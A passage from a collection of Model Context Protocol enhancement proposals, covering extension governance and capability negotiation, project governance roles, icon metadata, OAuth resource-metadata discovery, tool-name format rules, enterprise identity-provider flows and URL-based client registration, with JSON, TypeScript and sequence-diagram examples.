Once approved, the author SHOULD produce a PR that introduces the extension to the extension repository and references it in the main spec (see *Spec Recommendation* section). Approved extensions MAY be implemented in additional clients / servers / SDKs (see *SDK Implementation*).
#### Iteration
Once accepted, extensions may be iterated on without further review from the Core Maintainers. The extension repository maintainers are responsible for the review and acceptance of changes to an extension and SHOULD coordinate changes via the relevant working group(s). As extensions are independent of the core protocol, they may be updated and deployed at any time, but changes MUST account for backwards compatibility in their design.
#### Promotion to Core Protocol (Optional)
Eventually, some extensions MAY transition to being core protocol features. This SHOULD be treated as a Standards Track SEP with separate core maintainer review. Note that not all extensions are suitable for inclusion in the core protocol (e.g. those specific to an industry) and may remain as extensions indefinitely.
### Spec Recommendation
Extensions will be referenced from a new page on the MCP website at [modelcontextprotocol.io/extensions](http://modelcontextprotocol.io/extensions) (to be created) with links to their specification.
Links to relevant extensions MAY also be added to the core specification as appropriate (e.g. [https://modelcontextprotocol.io/specification/draft/basic/authorization](https://modelcontextprotocol.io/specification/draft/basic/authorization) may link to ext-auth extensions), but they MUST be clearly advertised as optional extensions and SHOULD be links only (not copies of specification text).
### SDK Implementation
SDKs MAY implement extensions. Where implemented, extensions MUST be disabled by default and require explicit opt-in. SDK documentation SHOULD list supported extensions.
SDK maintainers have full autonomy over extension support in their SDKs:
* Maintainers are solely responsible for the implementation and maintenance of any extensions they choose to support.
* Maintainers are under no obligation to implement any extension or accept contributed implementations. Extension support is not required for 100% protocol conformance or the upcoming SDK conformance tiers.
* This SEP does not prescribe how SDKs should structure or package extensions. Maintainers may provide extension points, plugin systems, or any other mechanism they see fit.
### Evolution
All extensions evolve **independently** of the core protocol, i.e. a new version of an extension MAY be published without review by the core maintainers. Minor updates, bug fixes, and non-breaking enhancements to an extension do not require a new SEP; these changes are managed by the extension repository maintainers.
Extensions SHOULD be versioned, but the exact versioning approach is not specified here.
### Negotiation
Clients and servers advertise their support for extensions in the [ClientCapabilities](https://modelcontextprotocol.io/specification/2025-06-18/schema#clientcapabilities) and [ServerCapabilities](https://modelcontextprotocol.io/specification/2025-06-18/schema#servercapabilities) fields respectively, and in the [Server Card](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1649) (currently in progress).
A new "extensions" field will be introduced to each that is a map of *extension identifiers* to per-extension settings objects. Each extension specifies the schema of its settings object; an empty object indicates no settings.
#### Client Capabilities
Clients advertise extension support in the `initialize` request:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "initialize",
"params": {
"protocolVersion": "2025-06-18",
"capabilities": {
"roots": {
"listChanged": true
},
"extensions": {
"io.modelcontextprotocol/ui": {
"mimeTypes": ["text/html;profile=mcp-app"]
}
}
},
"clientInfo": {
"name": "ExampleClient",
"version": "1.0.0"
}
}
}
```
#### Server Capabilities
Servers advertise extension support in the `initialize` response:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"protocolVersion": "2025-06-18",
"capabilities": {
"tools": {},
"extensions": {
"io.modelcontextprotocol/ui": {}
}
},
"serverInfo": {
"name": "ExampleServer",
"version": "1.0.0"
}
}
}
```
#### Server-Side Capability Checking
Servers SHOULD check client capabilities before offering extension-specific features:
```typescript theme={null}
const hasUISupport = clientCapabilities?.extensions?.[
"io.modelcontextprotocol/ui"
]?.mimeTypes?.includes("text/html;profile=mcp-app");
if (hasUISupport) {
// Register tools with UI features
} else {
// Register text-only fallback
}
```
#### Graceful Degradation
If one party supports an extension but the other does not, the supporting party MUST either revert to core protocol behavior or reject the request with an appropriate error if the extension is mandatory. Extensions SHOULD document their expected fallback behavior. For example, a server offering UI-enhanced tools should still return meaningful text content for clients that do not support the UI extension, while a server requiring a specific authentication extension MAY reject connections from clients that do not support it.
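As a sketch of the rejection branch, a server that treats an extension as mandatory might validate the negotiated client capabilities like this (the extension identifier and helper are hypothetical):

```typescript theme={null}
// Hypothetical sketch: reject clients that did not advertise a mandatory
// extension during initialization; an optional extension would instead
// trigger a fallback to core protocol behavior.
interface NegotiatedCapabilities {
  extensions?: Record<string, object>;
}

function assertRequiredExtension(capabilities: NegotiatedCapabilities): void {
  if (!capabilities.extensions?.["com.example/required-auth"]) {
    throw new Error(
      "Unsupported client: extension com.example/required-auth is required",
    );
  }
}
```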
### Legal Requirements
#### Trademark Policy
* Use of MCP trademarks in extension identifiers does not grant trademark rights. Third parties may not use 'MCP', 'Model Context Protocol', or confusingly similar marks in ways that imply endorsement or affiliation.
* MCP makes no judgment about trademark validity of terms used in extensions.
#### Antitrust
* Extension developers acknowledge that they may compete with other participants, have no obligation to implement any extension, are free to develop competing extensions and protocols, and may license their technology to third parties including for competing solutions.
* Status as an official extension does not create an exclusive relationship.
* Extension repository maintainers act in individual capacity using best technical judgment.
#### Licensing
Official extensions MUST be available under the Apache 2.0 license.
#### Contributor License Grant
By submitting a contribution to an official MCP extension repository, you represent that:
1. You have the legal authority to grant the rights in this agreement
2. Your contribution is your original work, or you have sufficient rights to submit it
3. You grant to Linux Foundation and recipients of the specification a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable license to:
* Reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute the contribution
* Make, have made, use, offer to sell, sell, import, and otherwise transfer implementations
#### No Other Rights
Except as explicitly set forth in this section, no other patent, trademark, copyright, or other intellectual property rights are granted under this agreement, including by implication, waiver, or estoppel.
### Not Specified
This SEP does not specify all aspects of an extension system. The following is an incomplete list of what this SEP does not address:
* **Schema**: we do not specify a mechanism for extensions to advertise how they modify the schema.
* **Dependencies**: we do not specify if/how extensions may have dependencies on specific core protocol versions, or interdependencies with other extensions (or versions of extensions).
* **Profiles**: we do not specify a way of grouping extensions.
These are omitted not because they are unimportant, but because they can be added later; the goal of this SEP is simply to get an initial extension structure off the ground, deferring detailed technical discussion of the more complex or debatable aspects of extensions.
## Rationale
This design for extensions uses the following principles:
* **Start simple**: the intention is to have a relatively simple mechanism that allows people to start building and proposing extensions in a structured way.
* **Clear governance**: For now, the focus is on clear governance and less on implementation details.
* **Refine later**: Over time, once we have more experience with extensions, we can adjust the approach appropriately.
Some specific design choices:
* **Why extension repositories instead of individual/independent extensions?** Repositories provide a natural grouping and governance structure that allows repository maintainers to enforce structure and conformity across extensions. This avoids the failure case of different extensions in an area working in incompatible ways, and also provides a way to delegate much of the governance work.
* **Why not require core maintainer review for official extensions?** Delegated review allows extensions to evolve autonomously without being bottlenecked on core maintainer review, which is already a long (often months-long) process.
* **Why separate versioning?** Extensions are additions to the spec and optional so there is no need to tie versions together. Separate versions allow for more rapid iteration.
## Backward Compatibility
The extension framework itself is purely additive to the core protocol, so there are no backwards compatibility concerns with the core specification.
The design described in this SEP is consistent with existing official extensions ([ext-apps](https://github.com/modelcontextprotocol/ext-apps) and [ext-auth](https://github.com/modelcontextprotocol/ext-auth)), which already use the patterns specified here for capability negotiation and extension identifiers.
However, individual extensions may have their own backwards compatibility concerns. Extensions MUST consider and account for backwards compatibility in their design, both across core protocol versions and extension versions. Breaking changes within an extension MUST use a new extension identifier (see *Definition* section). Extensions SHOULD also document their approach to backwards compatibility and stability (e.g. an extension MAY advertise itself as "experimental" indicating that it may break without notice).
## Security Implications
Extensions MUST implement all related security best practices in the area that they extend.
Clients and servers SHOULD treat any new fields or data introduced as part of an extension as untrusted and SHOULD comprehensively validate them.
## Reference Implementation
To be provided.
# SEP-932: Model Context Protocol Governance
Source: https://modelcontextprotocol.io/community/seps/932-model-context-protocol-governance
Model Context Protocol Governance
Final
Process
| Field | Value |
| ------------- | ----------------------------------------------------------------------------- |
| **SEP** | 932 |
| **Title** | Model Context Protocol Governance |
| **Status** | Final |
| **Type** | Process |
| **Created** | 2025-07-08 |
| **Author(s)** | David Soria Parra |
| **Sponsor** | None |
| **PR** | [#931](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/931) |
***
## Abstract
This SEP establishes the formal governance model for the Model Context Protocol (MCP) project. It defines the organizational structure, decision-making processes, and contribution guidelines necessary for transparent and effective project stewardship. The proposal introduces a hierarchical governance structure with clear roles and responsibilities, along with the Specification Enhancement Proposal (SEP) process for managing protocol changes.
## Motivation
As the Model Context Protocol grows in adoption and complexity, the need for formal governance becomes critical. The current informal decision-making process lacks:
1. **Transparency**: Community members have no clear visibility into how decisions are made
2. **Participation Pathways**: Contributors lack defined ways to influence project direction
3. **Accountability**: No formal structure exists for resolving disputes or contentious issues
4. **Scalability**: Ad-hoc processes cannot scale with growing community and technical complexity
Without formal governance, the project risks:
* Fragmentation of the ecosystem
* Unclear or inconsistent technical decisions
* Reduced community trust and participation
* Inability to effectively manage contributions at scale
## Rationale
The proposed governance model draws inspiration from successful open source projects like Python, PyTorch, and Rust. Key design decisions include:
### Hierarchical Structure
We chose a hierarchical model (Contributors → Maintainers → Core Maintainers → Lead Maintainers) that reflects how project decisions are effectively made today. From there, we will continue to evolve governance in the best interest of the project.
### Individual vs Corporate Membership
Membership is explicitly tied to individuals rather than companies to:
* Ensure decisions prioritize protocol integrity over corporate interests
* Prevent capture by any single organization
* Maintain continuity when individuals change employers
### SEP Process
The Specification Enhancement Proposal process ensures:
* All protocol changes undergo thorough review
* Community input is systematically collected
* Design decisions are documented for posterity
* Implementation precedes finalization
## Specification
### Governance Structure
#### Contributors
* Any individual who files issues, submits pull requests, or participates in discussions
* No formal membership or approval required
#### Maintainers
* Responsible for specific components (SDKs, documentation, etc.)
* Appointed by Core Maintainers
* Have write/admin access to their repositories
* May establish component-specific processes
#### Core Maintainers
* Deep understanding of MCP specification required
* Responsible for protocol evolution and project direction
* Meet bi-weekly for decisions
* Can veto maintainer decisions by majority vote
* Current members listed in governance documentation
#### Lead Maintainers
* Justin Spahr-Summers and David Soria Parra
* Can veto any decision
* Appoint/remove Core Maintainers
* Admin access to all infrastructure
## Backwards Compatibility
N/A
## Reference Implementation
See #931
1. **Documentation Files**:
* `/docs/community/governance.mdx` - Full governance documentation
* `/docs/community/sep-guidelines.mdx` - SEP process guidelines
## Security Implications
N/A
# SEP-973: Expose additional metadata for Implementations, Resources, Tools and Prompts
Source: https://modelcontextprotocol.io/community/seps/973-expose-additional-metadata-for-implementations-res
Expose additional metadata for Implementations, Resources, Tools and Prompts
Final
Standards Track
| Field | Value |
| ------------- | ----------------------------------------------------------------------------- |
| **SEP** | 973 |
| **Title** | Expose additional metadata for Implementations, Resources, Tools and Prompts |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-07-15 |
| **Author(s)** | [@jesselumarie](https://github.com/jesselumarie) |
| **Sponsor** | None |
| **PR** | [#973](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/973) |
***
## Abstract
This SEP proposes adding two optional fields, `icons` and `websiteUrl`, to the `Implementation` schema so that clients can visually identify third-party implementations and link directly to their documentation. The `icons` field will also be added to the `Tool`, `Resource`, and `Prompt` schemas. While both servers and clients can use these fields in all implementations, we expect them to be used initially for server-provided implementations.
## Motivation
### Current State
Current implementations only expose namespaced metadata, forcing clients to display generic labels with no visual cues.
### Proposed State
The proposed implementation would allow us to add visual affordances and links to documentation, making it easier to visually identify which servers/clients are providing an implementation, e.g. a tool in a slash command interface:
* **Visual Affordance:** Icons make it immediately clear to users which tool or resource source is in use.
* **Discoverability:** A link to documentation (`websiteUrl`) allows clients to direct users to more information with a single click.
## Rationale
This design builds on prior work in web manifests (MDN) and consolidates community feedback:
* **Consolidation of PRs:** Merges the changes from PR #417 and PR #862 into a single, cohesive enhancement.
* **Flexible Icon Sizes:** Supports multiple icon sizes (e.g., `48x48`, `96x96`, or `any` for vector formats) to accommodate different client UI needs.
* **Optional Fields:** By making both fields optional, existing implementations remain fully compatible.
## Specification
Extend the `Implementation` object as follows:
```typescript theme={null}
/**
* A URL pointing to an icon resource, or a base64-encoded data URI
*
* Clients that support rendering icons MUST support at least the following MIME types:
* - image/png - PNG images (safe, universal compatibility)
* - image/jpeg (and image/jpg) - JPEG images (safe, universal compatibility)
*
* Clients that support rendering icons SHOULD also support:
* - image/svg+xml - SVG images (scalable but requires security precautions)
* - image/webp - WebP images (modern, efficient format)
*/
export interface Icon {
/**
* A standard URI pointing to an icon resource.
*
* Consumers MUST take steps to ensure URLs serving icons are from the
* same domain as the client/server or a trusted domain.
*
* Consumers MUST take appropriate precautions when consuming SVGs as they can contain
* executable JavaScript
*
* @format uri
*/
src: string;
/** Optional override if the server’s MIME type is missing or generic. */
mimeType?: string;
/** e.g. "48x48", "any" (for SVG), or "48x48 96x96" */
sizes?: string;
}
/**
* Describes the MCP implementation
*/
export interface Implementation extends BaseMetadata {
version: string;
/**
* An optional list of icons for this implementation.
* This can be used by clients to display the implementation in a user interface.
* Each icon has a `src` property that points to an icon URL or a data URI, and may also include `mimeType` and `sizes` properties.
* The `mimeType` property should be a valid MIME type for the icon file, such as "image/png" or "image/svg+xml".
* The `sizes` property should be a string that specifies one or more sizes at which the icon file can be used, such as "48x48" or "any" for scalable formats like SVG.
* The `sizes` property is optional, and if not provided, the client should assume that the icon can be used at any size.
*/
icons?: Icon[];
/**
* An optional URL of the website for this implementation.
*
* Consumers MUST take steps to ensure the URL points to the same domain
* as the client/server or a trusted domain.
*
* @format uri
*/
websiteUrl?: string;
}
```
Extend the `Tool`, `Resource` and `Prompt` interfaces with the following type:
```typescript theme={null}
/**
* An optional list of icons for a resource.
* This can be used by clients to display the resource's icon in a user interface.
* Each icon has a `src` property that points to an icon URL or a data URI, and may also include `mimeType` and `sizes` properties.
* The `mimeType` property should be a valid MIME type for the icon file, such as "image/png" or "image/svg+xml".
* The `sizes` property should be a string that specifies one or more sizes at which the icon file can be used, such as "48x48" or "any" for scalable formats like SVG.
* The `sizes` property is optional, and if not provided, the client should assume that the icon can be used at any size.
*/
icons?: Icon[];
```
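As an illustration, a tool declaration carrying the new field might look like the following (the tool name and icon URLs are hypothetical):

```typescript theme={null}
// Hypothetical tool declaration using the proposed `icons` field.
const weatherTool = {
  name: "get_weather",
  description: "Returns the current weather for a location",
  inputSchema: { type: "object" as const, properties: {} },
  icons: [
    { src: "https://example.com/icons/weather-48.png", mimeType: "image/png", sizes: "48x48" },
    { src: "https://example.com/icons/weather.svg", mimeType: "image/svg+xml", sizes: "any" },
  ],
};
```

A client rendering this tool could pick the PNG for fixed-size UI slots and the SVG wherever scalable icons are supported.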
## Backwards Compatibility
Both `icons` and `websiteUrl` are optional fields; clients that ignore them will fall back to existing behavior.
## Security Implications
This shouldn't introduce any new security implications.
# SEP-985: Align OAuth 2.0 Protected Resource Metadata with RFC 9728
Source: https://modelcontextprotocol.io/community/seps/985-align-oauth-20-protected-resource-metadata-with-rf
Align OAuth 2.0 Protected Resource Metadata with RFC 9728
Final
Standards Track
| Field | Value |
| ------------- | ----------------------------------------------------------------------------- |
| **SEP** | 985 |
| **Title** | Align OAuth 2.0 Protected Resource Metadata with RFC 9728 |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-07-16 |
| **Author(s)** | sunishsheth2009 |
| **Sponsor** | None |
| **PR** | [#985](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/985) |
***
## Abstract
This proposal brings the MCP spec's handling of OAuth 2.0 Protected Resource Metadata in line with [RFC 9728](https://datatracker.ietf.org/doc/html/rfc9728#name-obtaining-protected-resourc).
Currently, the MCP spec requires the use of the HTTP WWW-Authenticate header when returning a 401 Unauthorized to indicate the location of the protected resource metadata. However, [RFC 9728, Section 5](https://datatracker.ietf.org/doc/html/rfc9728#section-5) states:
“A protected resource MAY use the WWW-Authenticate HTTP response header field, as discussed in RFC 9110, to return a URL to its protected resource metadata to the client.”
This suggests that the MCP spec could be made more flexible while still maintaining RFC compliance.
## Rationale
Many large-scale, dynamic, multi-tenant environments rely on a centralized authentication service separate from the backend resource servers. In such deployments, injecting WWW-Authenticate headers from backend services is non-trivial due to separation of concerns and infrastructure complexity.
In these scenarios, having the option to discover metadata via a well-known URL provides a practical path forward for easier MCP adoption. Requiring only the header would impose significant communication overhead between components, especially when hundreds or thousands of MCP instances are created and destroyed dynamically. Likewise, for managed MCP servers, adopting headers across a centralized system would add significant overhead.
While this increases complexity for clients, who must now implement logic to probe metadata endpoints, it reduces friction for server deployments and may encourage broader adoption. There are tradeoffs:
* **Pros for server developers:** avoids complex header injection; simplifies integration in distributed environments.
* **Cons for client developers:** clients must fall back to metadata discovery logic when the header is absent, increasing client complexity.
## Proposed State
Update the MCP spec to:
```
Clients MUST interpret the WWW-Authenticate header, and fall back to probing for metadata if it is not present.
Servers SHOULD return the WWW-Authenticate header.
```
**The reason for deviating slightly from the RFC:**
Going with SHOULD over MAY for WWW-Authenticate makes it easier to support other features, such as incremental authorization (e.g. you make a request for a tool but need additional scopes, and receive a WWW-Authenticate challenge indicating those scopes).
Based on the above, the updated flow is as follows:
* Attempt the MCP request without a token.
* If a 401 Unauthorized response is received: Check for a WWW-Authenticate header. If present and includes the resource\_metadata parameter, use it to locate the resource metadata.
* If the header is absent or does not include resource\_metadata, fall back to requesting /.well-known/oauth-protected-resource.
This change allows more flexible deployment models without removing existing capabilities.
```mermaid theme={null}
sequenceDiagram
participant C as Client
participant M as MCP Server (Resource Server)
participant A as Authorization Server
Note over C: Attempt unauthenticated MCP request
C->>M: MCP request without token
M-->>C: HTTP 401 Unauthorized (may include WWW-Authenticate header)
alt Header includes resource_metadata
Note over C: Extract resource_metadata URL from header
C->>M: GET resource_metadata URI
M-->>C: Resource metadata with authorization server URL
else No resource_metadata in header
Note over C: Fallback to metadata probing
C->>M: GET /.well-known/oauth-protected-resource
alt Metadata found
M-->>C: Resource metadata with authorization server URL
else Metadata not found
Note over C: Abort or use pre-configured values
end
end
Note over C: Validate RS metadata, build AS metadata URL
C->>A: GET /.well-known/oauth-authorization-server
A-->>C: Authorization server metadata
Note over C,A: OAuth 2.1 authorization flow happens here
C->>A: Token request
A-->>C: Access token
C->>M: MCP request with access token
M-->>C: MCP response
Note over C,M: MCP communication continues with valid token
```
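A client-side sketch of this discovery logic, under the assumption that a plain `fetch` of the server URL yields the 401 challenge, might look like the following (the function name and header parsing are illustrative, not normative):

```typescript theme={null}
// Hypothetical sketch of the fallback flow described above.
async function discoverResourceMetadataUrl(mcpUrl: string): Promise<string> {
  const response = await fetch(mcpUrl);
  if (response.status === 401) {
    const challenge = response.headers.get("WWW-Authenticate") ?? "";
    // Prefer the resource_metadata parameter from the header when present.
    const match = challenge.match(/resource_metadata="([^"]+)"/);
    if (match) return match[1];
  }
  // Header absent or missing the parameter: probe the well-known location.
  return new URL("/.well-known/oauth-protected-resource", mcpUrl).toString();
}
```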
## Backward Compatibility
This proposal is fully backward-compatible.
It retains support for the WWW-Authenticate header (already in the spec) and introduces a fallback mechanism using the .well-known metadata path, which is already defined in MCP as a MUST-support location.
Clients that already support metadata probing benefit from improved interoperability. Servers are not required to emit the WWW-Authenticate header if it is infeasible, but doing so is still encouraged to reduce client complexity and enable future extensibility.
# SEP-986: Specify Format for Tool Names
Source: https://modelcontextprotocol.io/community/seps/986-specify-format-for-tool-names
Specify Format for Tool Names
Final
Standards Track
| Field | Value |
| ------------- | ----------------------------------------------------------------------------- |
| **SEP** | 986 |
| **Title** | Specify Format for Tool Names |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-07-16 |
| **Author(s)** | kentcdodds |
| **Sponsor** | None |
| **PR** | [#986](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/986) |
***
## Abstract
The Model Context Protocol (MCP) currently lacks a standardized format for tool names, resulting in inconsistencies and confusion for both implementers and users. This SEP proposes a clear, flexible standard for tool names: tool names should be 1–64 characters, case-sensitive, and may include alphanumeric characters, underscores (\_), dashes (-), dots (.), and forward slashes (/). This aims to maximize compatibility, clarity, and interoperability across MCP implementations while accommodating a wide range of naming conventions.
## Motivation
Without a prescribed format for tool names, MCP implementations have adopted a variety of naming conventions, including different separators, casing, and character sets. This inconsistency can lead to confusion, errors in tool invocation, and difficulties in documentation and automation. Standardizing the allowed characters and length will:
* Make tool names predictable and interoperable across clients.
* Allow for hierarchical and namespaced tool names (e.g., using / and .).
* Support both human-readable and machine-generated names.
* Avoid unnecessary restrictions that could block valid use cases.
## Rationale
Community discussion highlighted the need for flexibility in tool naming. While some conventions (like lower-kebab-case) are common, many tools and clients use uppercase, underscores, dots, and slashes for namespacing or clarity. The proposed pattern—allowing a-z, A-Z, 0-9, \_, -, ., and /—is based on patterns used in major clients (e.g., VS Code, Claude) and aligns with common conventions in programming and APIs. Restricting spaces and commas avoids parsing issues and ambiguity. The length limit (1–64) is generous enough for most use cases but prevents abuse.
## Specification
* Tool names SHOULD be between 1 and 64 characters in length (inclusive).
* Tool names are case-sensitive.
* Allowed characters: uppercase and lowercase ASCII letters (A-Z, a-z), digits
(0-9), underscore (\_), dash (-), dot (.), and forward slash (/).
* Tool names SHOULD NOT contain spaces, commas, or other special characters.
* Tool names SHOULD be unique within their namespace.
* Example valid tool names:
* getUser
* user-profile/update
* DATA\_EXPORT\_v2
* admin.tools.list
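These rules can be enforced with a single regular expression. The following minimal sketch (non-normative) validates names at registration time:

```python theme={null}
import re

# 1-64 characters from the allowed set: letters, digits, _ - . /
TOOL_NAME_PATTERN = re.compile(r"^[A-Za-z0-9_\-./]{1,64}$")

def is_valid_tool_name(name: str) -> bool:
    """Check a tool name against the SEP-986 format rules."""
    return TOOL_NAME_PATTERN.fullmatch(name) is not None

assert is_valid_tool_name("user-profile/update")
assert is_valid_tool_name("DATA_EXPORT_v2")
assert not is_valid_tool_name("get user")  # spaces are disallowed
assert not is_valid_tool_name("a" * 65)    # exceeds the 64-character limit
```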
## Backwards Compatibility
This change is not backwards compatible for existing tools that use disallowed characters or exceed the new length limits. To minimize disruption:
* Existing non-conforming tool names SHOULD be supported as aliases for at least one major version, with a deprecation warning.
* Tool authors SHOULD update their documentation and code to use the new format.
* A migration guide SHOULD be provided to assist implementers in updating their tool names.
## Reference Implementation
A reference implementation can be provided by updating the MCP core library to enforce the new tool name validation rules at registration time. Existing tools can be updated to provide aliases for their new conforming names, with warnings for deprecated formats. Example code and migration scripts can be included in the MCP repository.
## Security Implications
None. Standardizing tool name format does not introduce new security risks.
# SEP-990: Enable enterprise IdP policy controls during MCP OAuth flows
Source: https://modelcontextprotocol.io/community/seps/990-enable-enterprise-idp-policy-controls-during-mcp-o
Enable enterprise IdP policy controls during MCP OAuth flows
Final
Standards Track
| Field | Value |
| ------------- | ----------------------------------------------------------------------------- |
| **SEP** | 990 |
| **Title** | Enable enterprise IdP policy controls during MCP OAuth flows |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-06-04 |
| **Author(s)** | Aaron Parecki ([@aaronpk](https://github.com/aaronpk)) |
| **Sponsor** | None |
| **PR** | [#646](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/646) |
***
## Abstract
This extension is designed to facilitate secure and interoperable authorization of MCP clients within corporate environments, leveraging existing enterprise identity infrastructure.
* For end users, this removes the need to manually connect and authorize the MCP Client to individual services within the organization.
* For enterprise admins, this enables visibility and control over which MCP Servers are able to be used within the organization.
## How Has This Been Tested?
We have an end-to-end implementation of this [here](https://github.com/oktadev/okta-cross-app-access-mcp), and in-progress MCP implementations with some partners.
## Breaking Changes
This is designed to augment the existing OAuth profile by providing an alternative when used under an enterprise IdP. MCP clients can opt in to this profile when necessary.
## Additional Context
For more background on this problem, you can refer to my blog post about this here:
[Enterprise-Ready MCP](https://aaronparecki.com/2025/05/12/27/enterprise-ready-mcp)
I also presented this at the MCP Dev Summit in May.
A high-level overview of the flow is below:
```mermaid theme={null}
sequenceDiagram
participant UA as Browser
participant C as MCP Client
participant MAS as MCP Authorization Server
participant MRS as MCP Resource Server
participant IdP as Identity Provider
rect rgb(255,255,225)
C-->>UA: Redirect to IdP
UA->>+IdP: Redirect to IdP
Note over IdP: User Logs In
IdP-->>-UA: IdP Authorization Code
UA->>C: IdP Authorization Code
C->>+IdP: Token Request with IdP Authorization Code
IdP-->-C: ID Token
end
note over C: User is logged in to MCP Client. Client stores ID Token.
C->+IdP: Exchange ID Token for ID-JAG
note over IdP: Evaluate Policy
IdP-->-C: Responds with ID-JAG
C->+MAS: Token Request with ID-JAG
note over MAS: Validate ID-JAG
MAS-->-C: MCP Access Token
loop
C->>+MRS: Call MCP API with Access Token
MRS-->>-C: MCP Response with Data
end
```
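The two token requests at the heart of this flow are ordinary OAuth token-endpoint calls. The sketch below is illustrative only: the endpoint URLs are hypothetical, and the grant-type and token-type URNs follow the in-progress cross-app access drafts, so they may change as the specifications evolve:

```python theme={null}
import requests

# Hypothetical endpoints, for illustration only
IDP_TOKEN_URL = "https://idp.example.com/oauth2/token"
MCP_AS_TOKEN_URL = "https://mcp-as.example.com/token"

def exchange_for_id_jag(id_token: str, resource: str) -> str:
    """Exchange the user's ID token for an ID-JAG at the IdP
    (RFC 8693 token exchange); the IdP evaluates policy here."""
    resp = requests.post(IDP_TOKEN_URL, data={
        "grant_type": "urn:ietf:params:oauth:grant-type:token-exchange",
        "subject_token": id_token,
        "subject_token_type": "urn:ietf:params:oauth:token-type:id_token",
        "requested_token_type": "urn:ietf:params:oauth:token-type:id-jag",
        "resource": resource,  # the MCP server the client wants to reach
    })
    resp.raise_for_status()
    return resp.json()["access_token"]

def redeem_id_jag(id_jag: str) -> str:
    """Present the ID-JAG to the MCP authorization server as a JWT
    assertion grant to obtain an MCP access token."""
    resp = requests.post(MCP_AS_TOKEN_URL, data={
        "grant_type": "urn:ietf:params:oauth:grant-type:jwt-bearer",
        "assertion": id_jag,
    })
    resp.raise_for_status()
    return resp.json()["access_token"]
```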
# SEP-991: Enable URL-based Client Registration using OAuth Client ID Metadata Documents
Source: https://modelcontextprotocol.io/community/seps/991-enable-url-based-client-registration-using-oauth-c
Enable URL-based Client Registration using OAuth Client ID Metadata Documents
Final
Standards Track
| Field | Value |
| ------------- | ----------------------------------------------------------------------------------------------------------------- |
| **SEP** | 991 |
| **Title** | Enable URL-based Client Registration using OAuth Client ID Metadata Documents |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-07-07 |
| **Author(s)** | Paul Carleton ([@pcarleton](https://github.com/pcarleton)) Aaron Parecki ([@aaronpk](https://github.com/aaronpk)) |
| **Sponsor** | None |
| **PR** | [#991](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/991) |
***
## Abstract
This SEP proposes adopting OAuth Client ID Metadata Documents as specified in [draft-parecki-oauth-client-id-metadata-document-03](https://datatracker.ietf.org/doc/draft-parecki-oauth-client-id-metadata-document/) as an additional client registration mechanism for the Model Context Protocol (MCP). This approach allows OAuth clients to use HTTPS URLs as client identifiers, where the URL points to a JSON document containing client metadata. This specifically addresses the common MCP scenario where servers and clients have no pre-existing relationship, enabling servers to trust clients without pre-coordination while maintaining full control over access policies.
## Motivation
The Model Context Protocol currently supports two client registration approaches:
1. **Pre-registration**: Requires either client developers or users to manually register clients with each server
2. **Dynamic Client Registration (DCR)**: Allows just-in-time registration by sending client metadata to a registration endpoint on the authorization server.
Both approaches have significant limitations for MCP's use case where clients frequently need to connect to servers they've never encountered before:
* Pre-registration by developers is impractical as servers may not exist when clients ship
* Pre-registration by users creates poor UX requiring manual credential management
* DCR requires servers to manage unbounded databases, handle expiration, and trust self-asserted metadata
### The Target Use Case: No Pre-existing Relationship
This proposal specifically targets the common MCP scenario where:
* A user wants to connect a client to a server they've discovered
* The client developer has never heard of this server
* The server operator has never heard of this client
* Both parties need to establish trust without prior coordination
For scenarios with pre-existing relationships, pre-registration remains the optimal solution. However, MCP's value comes from its ability to connect arbitrary clients and servers, making the "no pre-existing relationship" case critical to address.
Relatedly, there are many more MCP servers than there are clients (much as there are many more APIs than web browsers). A common scenario is an MCP server developer wanting to restrict usage to a set of clients they trust.
### Key Innovation: Server-Controlled Trust Without Pre-Coordination
Client ID Metadata Documents enable a unique trust model where:
1. **Servers can trust clients they've never seen before** based on:
* The HTTPS domain hosting the metadata
* The metadata content itself
* Domain reputation and security policies
2. **Servers maintain full control** through flexible policies:
* **Open Servers**: Can accept any HTTPS client\_id, enabling maximum interoperability
* **Protected Servers**: Can restrict to trusted domains or specific clients
3. **No client pre-coordination required**:
* Clients don't need to know about servers in advance
* Clients just need to host their metadata document
* Trust flows from the client's domain, not prior registration
## Specification Changes
The specification change adds Client ID Metadata Documents as a SHOULD and downgrades DCR to a MAY, since we think Client ID Metadata Documents are the better default option for this scenario.
We will primarily rely on the text in the linked RFC, aiming not to repeat most of it. Below is a short version of what we'll need to specify.
```mermaid theme={null}
sequenceDiagram
participant User
participant Client as MCP Client
participant Server as Authorization Server
participant Metadata as Metadata Endpoint (Client's HTTPS URL)
participant Resource as MCP Server
Note over Client,Metadata: Client hosts metadata at https://app.example.com/oauth/metadata.json
User->>Client: Initiates connection to MCP Server
Client->>Server: Authorization Request client_id=https://app.example.com/oauth/metadata.json redirect_uri=http://localhost:3000/callback
Note over Server: Authenticates user
Note over Server: Detects URL-formatted client_id
Server->>Metadata: GET https://app.example.com/oauth/metadata.json
Metadata-->>Server: JSON Metadata Document {client_id, client_name, redirect_uris, ...}
Note over Server: Validates: 1. client_id matches URL 2. redirect_uri in allowed list 3. Document structure valid 4. Domain allowed via trust policy
alt Validation Success
Server->>User: Display consent page with client_name
User->>Server: Approves access
Server->>Client: Authorization code via redirect_uri
Client->>Server: Exchange code for token client_id=https://app.example.com/oauth/metadata.json
Server-->>Client: Access token
Client->>Resource: MCP requests with access token
Resource-->>Client: MCP responses
else Validation Failure
Server->>User: Error response error=invalid_client or invalid_request
end
Note over Server: Cache metadata for future requests (respecting HTTP cache headers)
```
### Client Requirements
* Clients MUST host their metadata document at an HTTPS URL following RFC requirements
* The client\_id URL MUST use "https" scheme and contain a path component
* Metadata documents MUST be valid JSON and include at minimum:
* `client_id`: matching the document URL exactly
* `client_name`: human-readable name for authorization prompts
